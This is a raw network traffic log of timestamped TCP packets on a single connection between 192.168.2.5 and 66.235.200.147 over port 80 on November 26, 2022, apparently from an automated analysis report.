Nov 26, 2022 11:17:42.369492054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369493961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369513035 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369523048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369532108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369546890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369570971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369585991 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369595051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369611979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369616985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369633913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369638920 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369648933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369658947 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369663954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369679928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369698048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369713068 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369719982 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369733095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369751930 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369754076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369767904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369776011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369797945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369797945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369812965 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369818926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369837999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369846106 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369858027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369878054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369891882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369898081 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369913101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369918108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369936943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369939089 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369952917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369956970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369965076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369976997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.369992018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.369997025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370016098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370019913 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370035887 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370052099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370055914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370066881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370075941 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370090008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370101929 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370101929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370122910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370146990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370161057 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370167017 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370173931 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370187044 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370204926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370215893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370224953 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370233059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370244026 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370260954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370263100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370273113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370282888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370286942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370302916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370310068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370322943 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370332003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370342970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370363951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370369911 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370383024 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370404005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370414019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370423079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370429039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370445013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370454073 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370464087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370467901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370485067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370507002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370515108 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370527029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370544910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370546103 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370564938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370577097 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370584965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370589018 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370605946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370609999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370625973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370635986 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370646000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370662928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370666981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370682955 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370688915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370702028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370704889 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370714903 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370724916 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370739937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370744944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370760918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370775938 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370785952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370796919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370805025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370825052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370845079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370851040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370863914 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370892048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370894909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370915890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370932102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370935917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370944023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370956898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370973110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370976925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.370987892 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.370996952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371011019 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371017933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371033907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371037960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371047974 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371057987 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371077061 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371077061 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371094942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371094942 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371115923 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371129990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371139050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371146917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371162891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371166945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371185064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371189117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371203899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371205091 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371226072 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371238947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371246099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371268034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371273041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371284962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371289015 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371309042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371325970 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371328115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371346951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371364117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371367931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371386051 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371387005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371398926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371407986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371419907 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371428013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371448994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371460915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371460915 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371469021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371476889 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371495008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371524096 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371531010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371531010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371547937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371547937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371567965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371575117 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371587992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371593952 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371606112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371608973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371629000 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371649027 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371659040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371671915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371682882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371692896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371706963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371718884 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371723890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371745110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371746063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371766090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371777058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371788025 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371807098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371804953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371804953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371825933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371830940 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371845961 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371846914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371870041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371874094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371889114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371903896 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371922970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371931076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371943951 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371958017 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371962070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371984959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.371984959 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.371995926 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372004986 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372018099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372025013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372030973 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372045040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372051954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372065067 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372080088 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372085094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372092962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372103930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372106075 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372121096 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372132063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372150898 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372155905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372170925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372183084 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372190952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372195959 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372210026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372211933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372230053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372248888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372267962 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372267962 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372287989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372297049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372308016 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372312069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372328043 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372343063 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372348070 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372354984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372366905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372369051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372389078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372391939 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372409105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372410059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372428894 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372432947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372447968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372461081 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372469902 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372473955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372483969 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372490883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372509956 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372514963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372529030 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372539997 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372550011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372553110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372570992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372577906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372587919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372591019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372610092 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372615099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372628927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372637987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372643948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372652054 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372659922 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372669935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372679949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372680902 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372699022 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372714043 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372726917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372742891 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372745991 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372756004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372766972 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372770071 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372785091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372787952 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372807980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372808933 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372853041 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372921944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372951984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372970104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.372973919 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372993946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.372998953 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373011112 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373011112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373032093 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373033047 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373044968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373051882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373070955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373071909 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373092890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373101950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373111963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373116016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373131990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373152018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373152971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373179913 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373200893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373200893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373203993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373215914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373224974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373243093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373244047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373258114 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373264074 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373282909 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373284101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373300076 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373305082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373322010 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.373327971 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.373353004 CET	49707	80	192.168.2.5	66.235.200.147
